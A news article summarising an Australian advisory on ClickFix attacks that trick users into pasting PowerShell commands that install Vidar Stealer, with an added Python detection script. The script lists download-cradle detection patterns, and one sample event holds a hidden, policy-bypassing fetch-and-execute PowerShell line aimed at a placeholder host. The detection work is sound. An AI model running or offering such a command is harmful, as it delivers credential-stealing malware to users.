Australia warns of ClickFix attacks spreading Vidar Stealer malware

Australia’s cyber security agency has warned organizations about an ongoing ClickFix malware campaign that uses compromised WordPress websites to push Vidar Stealer to Australian infrastructure and other entities.

KEY FACTS

  • Technique: ClickFix relies on fake CAPTCHA or browser verification prompts to trick users into running malicious commands.
  • Payload: The campaign delivers Vidar Stealer, an info-stealing malware family that has been active since late 2018.
  • Delivery: Victims are redirected from compromised WordPress sites to prompts that instruct them to copy and run PowerShell commands.
  • Defense: The advisory recommends restricting PowerShell and using application allow-listing.

The advisory from the Australian Cyber Security Centre (ACSC), the Australian Signals Directorate’s cyber security arm, said it has observed ClickFix-associated activity using WordPress-hosted infrastructure to distribute the malware.

In the attacks, users visiting compromised websites are shown a fake Cloudflare verification or CAPTCHA prompt. The prompt instructs them to copy and run a malicious PowerShell command themselves, and that command leads to infection.
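Because the victim, not an exploit, launches the PowerShell command, the most reliable place to catch this pattern is process-creation telemetry: a PowerShell shell spawned from the user's interactive session with a command line that fetches and executes remote content. The script below is an added example, not code from the ACSC advisory or any vendor product. It scores constructed process-creation records against the traits described above; the pipe-separated record layout, the parent and image lists, and the sample lines are all assumptions made for illustration.

```python
"""Score process-creation events for the ClickFix pattern: a user-launched
PowerShell shell whose command line downloads and runs remote content.

Added example, not from the ACSC advisory. The record layout
(parent|image|command line) and the sample events are constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Parents that mean a person typed or pasted the command (Explorer's Run
# dialog, a console) rather than a scheduled task or management agent.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of "fetch and execute" rather than routine
# administration. Each matching trait adds one point to the score.
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(
        r"invoke-webrequest|\biwr\b|\birm\b|downloadstring|net\.webclient", re.I),
    "inline_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}


@dataclass
class ProcessEvent:
    parent: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse the constructed 'parent|image|command line' layout."""
    parent, image, command_line = line.split("|", 2)
    return ProcessEvent(parent.strip().lower(), image.strip().lower(), command_line.strip())


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched trait names); non-shell images score zero."""
    if ev.image not in SHELL_IMAGES:
        return 0, []
    hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(ev.command_line)]
    score = len(hits)
    # A suspicious command line launched from the user's own session is the
    # ClickFix signature; weight it, but only when some trait already matched.
    if hits and ev.parent in INTERACTIVE_PARENTS:
        hits.append("interactive_parent")
        score += 1
    return score, hits


def find_clickfix_candidates(lines: list[str], threshold: int = 2) -> list[tuple[ProcessEvent, int, list[str]]]:
    """Return events whose score reaches the threshold."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        score, hits = score_event(ev)
        if score >= threshold:
            findings.append((ev, score, hits))
    return findings


# Constructed sample events; the URL uses the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # Benign: maintenance script run by a service, no interactive parent
    "svchost.exe|powershell.exe|powershell.exe -File C:\\Scripts\\backup.ps1",
    # Benign: interactive but ordinary administration
    "explorer.exe|powershell.exe|powershell.exe Get-Service",
    # ClickFix-style: pasted by the user, hidden window, fetches and runs remote content
    "explorer.exe|powershell.exe|powershell -w hidden -ep bypass -c \"iex (irm http://example.invalid/verify)\"",
    # Not a shell at all
    "explorer.exe|notepad.exe|notepad.exe notes.txt",
]

if __name__ == "__main__":
    for ev, score, hits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"score={score} parent={ev.parent} traits={hits}\n  {ev.command_line}")
```

Only the third sample crosses the threshold; the scheduled script and the plain interactive `Get-Service` call score zero, which is the point of scoring traits in combination rather than alerting on every PowerShell launch. In production the same logic would read Sysmon Event ID 1 or Windows Security 4688 records instead of the constructed layout, and the trait list would be tuned against the organisation's own administrative scripts.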

Vidar Stealer targets browser passwords, cookies, cryptocurrency wallets, autofill data and system details. The malware can delete its executable after launch and then run from memory, which can reduce forensic artifacts.

The advisory says the malware can retrieve command-and-control settings through dead-drop URLs that use public services such as Telegram bots and Steam profiles. It also advises WordPress administrators to install security updates for themes and add-ons and remove unused plugins and themes.

The advisory includes indicators of compromise that organizations can use for detection and defense. The campaign shows how social engineering and compromised web infrastructure combine to sidestep the controls that would normally block a malicious download: the user runs the command themselves, so no exploit is needed.

WHY IT MATTERS

The campaign can expose credentials and wallet data if users are fooled into running the command. It also highlights the risk from WordPress sites that are not fully patched and from malware that is designed to leave fewer traces behind.